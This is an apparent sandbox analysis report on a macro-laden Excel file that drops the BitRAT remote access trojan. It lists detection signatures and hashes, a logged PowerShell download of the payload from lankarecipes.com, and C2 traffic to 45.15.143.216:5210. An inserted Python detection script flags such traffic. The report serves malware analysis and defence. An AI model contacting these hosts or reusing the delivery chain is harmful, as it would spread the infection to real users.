Analysis Report Scanned_25526662-Payment.xls

Overview

General Information

Sample Name: Scanned_25526662-Payment.xls
Analysis ID: 337288
MD5: cd7d4543958945e3fab4f0631e3494f3
SHA1: 3e00f26ab9384c9c1bb24eeb2de331f751f536ed
SHA256: b7a919bb30c1633483399356aedf42c11656c8a076be969e85b57ccdd071b879
Tags: BitRAT, RAT, Strato, xls

Detection

Hidden Macro 4.0 BitRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected BitRAT
Contains functionality to create processes via WMI
Contains functionality to hide a thread from the debugger
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Hides threads from debuggers
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Test1.txt ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: Scanned_25526662-Payment.xls Virustotal: Detection: 14%
Source: Scanned_25526662-Payment.xls ReversingLabs: Detection: 15%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Test1.txt Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00426ED0 __vbaAryLock,__vbaAryUnlock,#644,#644,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr, 27_2_00426ED0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00426B80 __vbaAryLock,__vbaAryUnlock,__vbaAryLock,__vbaStrVarCopy,__vbaStrMove,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaLenBstrB,CryptHashData,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarZero,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaAryLock,__vbaAryLock,CryptDecrypt,__vbaAryUnlock,__vbaRedimPreserve,__vbaFreeStr, 27_2_00426B80
Source: Test3.jpg, 0000001B.00000002.361415384.00000000030E0000.00000040.00000001.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError, 29_2_00426F7A

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: lankarecipes.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49734 -> 45.15.143.216:5210
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Sparc.jpg HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: lankarecipes.com | Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216 (50 occurrences)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00415B0A WSARecv, 29_2_00415B0A
Source: global traffic HTTP traffic detected: GET /Sparc.jpg HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: lankarecipes.com | Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: lankarecipes.com
Source: PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt.3.dr String found in binary or memory: http://lankarecipes.com/Sparc.jp
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.cortana.ai
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.office.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.onedrive.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://augloop.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cdn.entity.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cortana.ai
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cortana.ai/api
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cr.office.com
Source: Test3.jpg, Test3.jpg, 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://directory.services.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://graph.windows.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://graph.windows.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.windows.local
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://management.azure.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://management.azure.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://messaging.office.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://officeapps.live.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://onedrive.live.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://settings.outlook.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://tasks.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://www.odwebp.svc.ms
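The Networking evidence above reduces to three observables worth alerting on: a user agent that opens with Mozilla/5.0 but carries a WindowsPowerShell token, used to fetch a .jpg that turns out to be a payload; a TCP session to 45.15.143.216 that no DNS query preceded; and a destination port (5210) outside the usual service set. The Python below is an added example, not part of the Joe Sandbox report, that runs those three checks over records constructed to mirror the report's DNS answer, HTTP GET and TCP flows. The record layout, the port list and the user-agent markers are assumptions of the example.

```python
"""Added example, not part of the Joe Sandbox report: network triage for
the observables in the Networking section. Records are constructed to
mirror the report; the port list and UA markers are assumptions."""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import List, Tuple

# Assumed lists: ports we treat as ordinary, and tokens that mark a script
# host rather than a browser even when the UA opens with "Mozilla/5.0".
STANDARD_PORTS = {80, 443, 53, 25, 110, 143, 587, 993, 995, 8080}
SCRIPT_UA_MARKERS = ("WindowsPowerShell", "python-requests", "curl/", "Wget/")
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


@dataclass
class Finding:
    rule: str
    detail: str


def check_flows(flows: List[Tuple[str, int, str, int]],
                dns_answers: List[Tuple[str, str]]) -> List[Finding]:
    """Flag public destinations that no DNS answer explains, and odd ports."""
    resolved = {ip for _, ip in dns_answers}
    out = []
    for _src, _sport, dst, dport in flows:
        if ip_address(dst).is_private:
            continue
        if dst not in resolved:
            out.append(Finding("tcp_without_dns",
                               f"{dst}:{dport} contacted without a prior DNS answer"))
        if dport not in STANDARD_PORTS:
            out.append(Finding("nonstandard_port", f"{dst}:{dport}"))
    return out


def check_http(requests: List[dict]) -> List[Finding]:
    """Flag a script-host UA pulling an image-named resource (payload staging)."""
    out = []
    for r in requests:
        ua = r["user_agent"]
        if any(m in ua for m in SCRIPT_UA_MARKERS) and r["path"].lower().endswith(IMAGE_EXT):
            out.append(Finding("script_ua_fetches_image",
                               f"{ua.split()[-1]} GET {r['host']}{r['path']}"))
    return out


def triage_network(flows, requests, dns_answers) -> List[Finding]:
    return check_flows(flows, dns_answers) + check_http(requests)


# Constructed records mirroring the report (analysis host 192.168.2.3).
DNS_ANSWERS = [("lankarecipes.com", "192.185.236.165")]
HTTP_REQUESTS = [{
    "dst": "192.185.236.165", "method": "GET", "path": "/Sparc.jpg",
    "host": "lankarecipes.com",
    "user_agent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1",
}]
TCP_FLOWS = [
    ("192.168.2.3", 49731, "192.185.236.165", 80),
    ("192.168.2.3", 49734, "45.15.143.216", 5210),
]

if __name__ == "__main__":
    for f in triage_network(TCP_FLOWS, HTTP_REQUESTS, DNS_ANSWERS):
        print(f"{f.rule}: {f.detail}")
```

The DNS check is the one that survives evasion best: a C2 address hard-coded in the implant, as here, never appears in the resolver log, so any outbound session to a public address with no matching answer deserves a look regardless of port.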

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global mouse hook
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Windows user hook set: 0 mouse low level NULL Jump to behavior

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Content 5 Al - " ;& r 6 I A I B C D E F I G I H I I I J C 7 8 1 9 2 10 3 11 4
Source: Screenshot number: 8 Screenshot OCR: Enable Editing" form the yellow bar and then click 5 8 "Enable Content" ,6 g 7 10 ,8 11 ,9 12
Source: Screenshot number: 8 Screenshot OCR: Enable Content X ' . Al " (" jR " 5 7 A B I C I D I, E I F G H I J K 'T , 1 I y 3 2 : Qil D?'
Contains functionality to create processes via WMI
